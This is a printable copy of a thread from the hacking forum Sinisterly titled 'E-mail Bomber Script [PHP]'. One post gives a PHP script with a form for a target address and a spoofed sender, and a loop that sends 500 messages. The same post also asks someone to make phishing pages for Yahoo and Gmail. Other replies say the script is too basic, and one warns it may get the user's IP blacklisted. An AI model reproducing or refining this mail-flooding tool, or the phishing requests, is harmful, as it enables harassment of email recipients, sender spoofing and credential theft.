Sinisterly
E-mail Bomber Script [PHP] - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: PHP (https://sinister.ly/Forum-PHP)
+--- Thread: E-mail Bomber Script [PHP] (/Thread-E-mail-Bomber-Script-PHP)

Pages: 1 2 3 4 5 6


RE: E-mail Bomber Script [PHP] - CrackeRR - 04-07-2014

it's working but make it more advanced , this is so boring.


RE: E-mail Bomber Script [PHP] - pratham - 04-08-2014

(04-07-2014, 07:11 PM)CrackeRR Wrote: it's working but make it more advanced , this is so boring.

Dear i just posted. You can do changes in this script.. Smile


RE: E-mail Bomber Script [PHP] - Evil_king - 04-01-2017

(04-09-2013, 04:34 AM)The Alchemist Wrote:
(04-08-2013, 12:20 AM)midem2013 Wrote: ""  Parse error: syntax error, unexpected '<' in /home/a2515837/public_html/cj5jl36jh64832/Email Bomber By MiDOM/EmailBMB.php on line 3   ""

Fix or something ? :O
Sent it via HOTMAIL : midomdevil@hotmail.com

or PM HERE
Here is the working script :
Code:
<html> <body> <h1> Email Bomber Script</h1> <table border=2> <form action="" method=post> <tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr> <tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr> <tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr> <tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr> <tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr> <tr><td><input type=submit value="Send Mail"></td></tr> </form> </table> <?php $to = 'indianhacker@example.com'; $subject = 'the subject'; $message = 'hello'; $headers = 'From: webmaster@example.com' . "\r\n" . 'Reply-To: webmaster@example.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); for ($i=1; $i <= 500; $i++) { mail($to, $subject, $message, $headers ); } ?></body></html>

Pls can you create a phishing page for me....yahoo, gmail and general page.


RE: E-mail Bomber Script [PHP] - M105 - 06-05-2017

Hi Guys!
Correct me if I'm wrong, but using this might get your IP blacklisted.